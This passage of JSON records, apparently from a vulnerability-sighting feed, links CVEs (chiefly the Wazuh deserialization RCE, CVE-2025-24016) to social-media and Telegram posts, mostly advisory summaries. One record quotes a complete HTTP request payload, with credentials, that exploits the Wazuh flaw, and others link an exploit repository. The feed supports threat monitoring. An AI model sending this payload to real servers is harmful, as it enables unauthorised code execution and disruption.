"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3lkkyp4o24y2b", "content": "", "creation_timestamp": "2025-03-17T10:58:15.255337Z"}, {"uuid": "af27f267-e5eb-4b75-a2bf-5b0af2bc92d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2401", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lklir4be6t2k", "content": "", "creation_timestamp": "2025-03-17T15:45:45.513198Z"}, {"uuid": "85e29b2f-30ed-48f1-b9ec-e7694864ff33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lreckkwmql2i", "content": "", "creation_timestamp": "2025-06-11T21:02:28.859141Z"}, {"uuid": "39f514a1-36c9-49b7-83ab-923f41da565c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lrjjtammz22g", "content": "", "creation_timestamp": "2025-06-13T22:55:48.980100Z"}, {"uuid": "c7652caf-5385-403b-a604-b58e4499fb20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24015", "type": "seen", "source": "https://bsky.app/profile/wasm.activitypub.awakari.com.ap.brid.gy/post/3lqqjwyabme52", "content": "", "creation_timestamp": "2025-06-04T00:22:49.203085Z"}, {"uuid": "e950a328-07a9-4dda-8c67-3d28840d48e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114660473206955438", "content": "", "creation_timestamp": "2025-06-10T18:26:15.314272Z"}, {"uuid": "ce85159a-ccce-4ab9-ba5f-5b7e8f1cebab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/573ac1af-09ee-407c-8c57-49f646908b21", "content": "", "creation_timestamp": "2026-02-02T12:25:59.085733Z"}, {"uuid": "9a063839-18cd-4b0c-8a46-278d6eebc0b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24013", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2408", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24013\n\ud83d\udd39 Description: CodeIgniter is a PHP full-stack web framework. Prior to 4.5.8, CodeIgniter lacked proper header validation for its name and value. The potential attacker can construct deliberately malformed headers with Header class. This could disrupt application functionality, potentially causing errors or generating invalid HTTP requests. In some cases, these malformed requests might lead to a DoS scenario if a remote service\u2019s web application firewall interprets them as malicious and blocks further communication with the application. This vulnerability is fixed in 4.5.8.\n\ud83d\udccf Published: 2025-01-20T15:57:37.975Z\n\ud83d\udccf Modified: 2025-01-21T14:51:01.754Z\n\ud83d\udd17 References:\n1. https://github.com/codeigniter4/CodeIgniter4/security/advisories/GHSA-x5mq-jjr3-vmx6\n2. https://github.com/codeigniter4/CodeIgniter4/commit/5f8aa24280fb09947897d6b322bf1f0e038b13b6\n3. https://datatracker.ietf.org/doc/html/rfc7230#section-3.2\n4. https://github.com/advisories/GHSA-wxmh-65f7-jcvw", "creation_timestamp": "2025-01-21T15:00:43.000000Z"}, {"uuid": "531c2c41-fd2d-47f2-8be5-6ded7d1b6df8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/53wIaU0p9a171JLE0jZDDl-ZAg4u8Rv0M34YJ8GhWlpV87c", "content": "", "creation_timestamp": "2025-06-11T03:00:06.000000Z"}, {"uuid": "c9d2ef33-5050-4491-ad10-f864bdba72ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17937", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24016\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H)\n\ud83d\udd39 Description: Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.\n\ud83d\udccf Published: 2025-02-10T19:08:09.058Z\n\ud83d\udccf Modified: 2025-06-10T17:15:40.324Z\n\ud83d\udd17 References:\n1. https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh", "creation_timestamp": "2025-06-10T17:32:27.000000Z"}, {"uuid": "c9b20032-1127-44ff-9948-f5ea7dfd865c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24011", "type": "seen", "source": "https://t.me/cvedetector/15978", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24011 - Umbraco Account Existence Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2025-24011 \nPublished : Jan. 21, 2025, 4:15 p.m. | 25\u00a0minutes ago \nDescription : Umbraco is a free and open source .NET content management system. Starting in version 14.0.0 and prior to versions 14.3.2 and 15.1.2, it's possible to determine whether an account exists based on an analysis of response codes and timing of Umbraco management API responses. Versions 14.3.2 and 15.1.2 contain a patch. No known workarounds are available. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"21 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-21T17:48:30.000000Z"}, {"uuid": "5e31ccb8-83dc-4489-998c-8bd60a638b6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24017", "type": "seen", "source": "https://t.me/cvedetector/15975", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24017 - YesWiki DOM-Based XSS\", \n  \"Content\": \"CVE ID : CVE-2025-24017 \nPublished : Jan. 21, 2025, 4:15 p.m. | 25\u00a0minutes ago \nDescription : YesWiki is a wiki system written in PHP. Versions up to and including 4.4.5 are vulnerable to any end-user crafting a DOM based XSS on all of YesWiki's pages which is triggered when a user clicks on a malicious link. The vulnerability makes use of the search by tag feature. When a tag doesn't exist, the tag is reflected on the page and isn't properly sanitized on the server side which allows a malicious user to generate a link that will trigger an XSS on the client's side when clicked. This vulnerability allows any user to generate a malicious link that will trigger an account takeover when clicked, therefore allowing a user to steal other accounts, modify pages, comments, permissions, extract user data (emails), thus impacting the integrity, availability and confidentiality of a YesWiki instance. Version 4.5.0 contains a patch for the issue. \nSeverity: 7.6 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"21 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-21T17:48:27.000000Z"}, {"uuid": "15db462d-d665-4eda-a11a-21d15d885ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24019", "type": "seen", "source": "https://t.me/cvedetector/15994", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24019 - YesWiki FastCGI Process Manager File Deletion Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24019 \nPublished : Jan. 21, 2025, 6:15 p.m. | 37\u00a0minutes ago \nDescription : YesWiki is a wiki system written in PHP. In versions up to and including 4.4.5, it is possible for any authenticated user, through the use of the filemanager to delete any file owned by the user running the FastCGI Process Manager (FPM) on the host without any limitation on the filesystem's scope. This vulnerability allows any authenticated user to arbitrarily remove content from the Wiki resulting in partial loss of data and defacement/deterioration of the website. In the context of a container installation of YesWiki without any modification, the `yeswiki` files (for example .php) are not owned by the same user (root) as the one running the FPM process (www-data). However in a standard installation, www-data may also be the owner of the PHP files, allowing a malicious user to completely cut the access to the wiki by deleting all important PHP files (like index.php or core files of YesWiki). Version 4.5.0 contains a patch for this issue. \nSeverity: 7.1 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"21 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-21T20:19:20.000000Z"}, {"uuid": "893b2bfd-cbd2-46a2-8f32-ec0a1e636f3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24018", "type": "seen", "source": "https://t.me/cvedetector/15981", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24018 - \"YesWiki Authenticated User Stored XSS\"\", \n  \"Content\": \"CVE ID : CVE-2025-24018 \nPublished : Jan. 21, 2025, 5:15 p.m. | 16\u00a0minutes ago \nDescription : YesWiki is a wiki system written in PHP. In versions up to and including 4.4.5, it is possible for an authenticated user with rights to edit/create a page or comment to trigger a stored XSS which will be reflected on any page where the resource is loaded. The vulnerability makes use of the content edition feature and more specifically of the `{{attach}}` component allowing users to attach files/medias to a page. When a file is attached using the `{{attach}}` component, if the resource contained in the `file` attribute doesn't exist, then the server will generate a file upload button containing the filename. This vulnerability allows any malicious authenticated user that has the right to create a comment or edit a page to be able to steal accounts and therefore modify pages, comments, permissions, extract user data (emails), thus impacting the integrity, availability and confidentiality of a YesWiki instance. Version 4.5.0 contains a patch for the issue. \nSeverity: 7.6 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"21 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-21T18:38:44.000000Z"}, {"uuid": "42e35b01-94f6-4742-b0dc-5bdc532b28b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24012", "type": "seen", "source": "https://t.me/cvedetector/15979", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24012 - Umbraco Cross-Site Scripting Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24012 \nPublished : Jan. 21, 2025, 4:15 p.m. | 25\u00a0minutes ago \nDescription : Umbraco is a free and open source .NET content management system. Starting in version 14.0.0 and prior to versions 14.3.2 and 15.1.2, authenticated users are able to exploit a cross-site scripting vulnerability when viewing certain localized backoffice components. Versions 14.3.2 and 15.1.2 contain a patch. \nSeverity: 4.6 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"21 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-21T17:48:31.000000Z"}, {"uuid": "5ad5f82f-8e59-4aea-bc63-379ac4a74ad5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/ujFiItu52V2xrlsXGQiLeg4-Ra7OYcKL6d9yb2Hm6tXrw-g", "content": "", "creation_timestamp": "2025-02-17T04:00:12.000000Z"}, {"uuid": "461b17f7-250c-4644-87fa-6c162c54c5bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/pioHib2nR2XYsdiAWAKSjrwD2AgkHgdboZVz1fxlp4Zhpko", "content": "", "creation_timestamp": "2025-02-10T21:00:22.000000Z"}, {"uuid": "a15c6d1e-ce04-42f9-be68-1e23567c3c2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/4173", "content": "#GitHub #Tools\n\nWazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses\n\n https://github.com/0xjessie21/CVE-2025-24016\n\nTool for monitor Active Directory changes in real time without getting all objects. Instead of this it use replication metadata and Update Sequence Number (USN) to filter current properties of objects.\n\nhttps://github.com/DrunkF0x/ADSpider\n\nMorgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.\n\nhttps://GitHub.com/VFA250/Morgan\n\n#HackersFactory", "creation_timestamp": "2025-03-05T01:42:04.000000Z"}, {"uuid": "6a459d18-1c40-49c8-a1c9-cc37df69d977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2528", "content": "CVE-2025-24016\n*\nRCE in Wazuh server\nwazuh-manager version >= 4.4.0\nPatched in version >= 4.9.1\n\nPOST /security/user/authenticate/run_as HTTP/1.1\nHost: target.com:55000\nCache-Control: max-age=0\nAccept-Language: en-US\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36\nAccept: application/json\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\nAuthorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded \"wazuh-wui:MyS3cr37P450r.*-\"\nContent-Type: application/json\nContent-Length: 83\n\n{\n  \"__unhandled_exc__\": {\n    \"__class__\": \"exit\",\n    \"__args__\": []\n  }\n}", "creation_timestamp": "2025-02-22T22:51:12.000000Z"}, {"uuid": "c604682c-a0ac-462c-a70e-8d4faa8c396a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8035", "content": "#GitHub #Tools\n\nWazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses\n\n https://github.com/0xjessie21/CVE-2025-24016\n\nTool for monitor Active Directory changes in real time without getting all objects. Instead of this it use replication metadata and Update Sequence Number (USN) to filter current properties of objects.\n\nhttps://github.com/DrunkF0x/ADSpider\n\nMorgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.\n\nhttps://GitHub.com/VFA250/Morgan\n\n#HackersFactory", "creation_timestamp": "2025-03-05T04:04:34.000000Z"}, {"uuid": "def849be-942d-4364-a26a-67f8271cb3f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://t.me/true_secator/6862", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b:\n\n1. \u041d\u0430\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u043a\u0430\u043a\u00a0DRAY:BREAK, \u0442\u0435\u043f\u0435\u0440\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u043c Mirai. \u041f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u044b DrayTek Vigor.\n\n2. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 watchTowr \u0432\u044b\u044f\u0432\u0438\u043b\u0438\u00a0\u0442\u0440\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\u00a0\u0432 Kentico Xperience CMS, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0430\u0439\u0442\u043e\u0432.\n\n\u041e\u043d\u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0434\u0432\u0430 \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 RCE \u043f\u043e\u0441\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u041f\u0430\u0442\u0447\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b, \u043d\u043e CVE \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442.\n\n3. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u0422\u0430\u043d \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0434\u0432\u0435\u00a0\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 JavaScript XML-crypto, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u0438\u0441\u0442\u0435\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0433\u0434\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445 XML-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432.\n\nWorkOS \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u043e\u0448\u0438\u0431\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 SAML \u0438 \u0432\u044b\u0434\u0430\u0447\u0438 \u0441\u0435\u0431\u044f \u0437\u0430 \u043b\u044e\u0431\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u0440\u0443\u0433\u0438\u0435 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 SAML, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443, \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b.\n\n4. \u0412 SIEM \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c Wazuh \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430\u00a0\u043e\u0448\u0438\u0431\u043a\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 (CVE-2025-24016).\n\n5. 0-day \u0432 Windows \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u043e\u0441\u044c\u043c\u0438 \u043b\u0435\u0442.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u044b \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 \u0432 \u0444\u0430\u0439\u043b\u044b \u044f\u0440\u043b\u044b\u043a\u043e\u0432 LNK, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u0432\u0438\u0434\u0438\u043c\u044b \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n\n\u041f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 11 APT \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u043d\u0443\u043b\u044c \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439 \u0432 \u0444\u0430\u0439\u043b\u0430\u0445 LNK. \n\nTrend Micro\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043f\u043e\u0447\u0442\u0438 1000 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 LNK, \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044e\u0449\u0438\u0445 \u044d\u0442\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u043a\u043e\u0439.\n\n\u041d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0443\u0434\u0438\u0432\u043b\u044f\u0435\u0442 Microsoft, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u0447\u0435\u0442\u0430 Trend Micro \u0432 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430. \u0412\u0438\u0434\u0438\u043c\u043e, \u043d\u0435 \u0441\u043e\u0433\u043b\u0430\u0441\u043e\u0432\u0430\u043b\u0438 \u043a\u0443\u0440\u0430\u0442\u043e\u0440\u044b.\n\n6. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 WordPress \u0441\u0442\u0430\u043d\u043e\u0432\u044f\u0442\u0441\u044f \u0432\u0441\u0435 \u043f\u0440\u043e\u0449\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u043d\u0430 \u0447\u0442\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0432\u044b\u0432\u043e\u0434\u044b \u0438\u0437\u00a0\u043e\u0442\u0447\u0435\u0442\u0430 Patchstack \u0437\u0430 2024 \u0433\u043e\u0434.\n\n43% \u0432\u0441\u0435\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 WordPress, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443, \u043d\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043b\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0430 \u043f\u043e\u0434\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u043b\u043e \u043f\u043b\u0430\u0433\u0438\u043d\u044b, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044f \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u044e, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0432\u0448\u0443\u044e\u0441\u044f \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0433\u043e\u0434\u044b.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0431\u044b\u043b\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043e \u043b\u0438\u0448\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043d\u043e \u0432\u0440\u0435\u043c\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0431\u044b\u043b\u043e \u043a\u043e\u0440\u043e\u0447\u0435, \u0447\u0435\u043c \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0433\u043e\u0434\u044b. \u041f\u043e \u0438\u0442\u043e\u0433\u0430\u043c \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043e 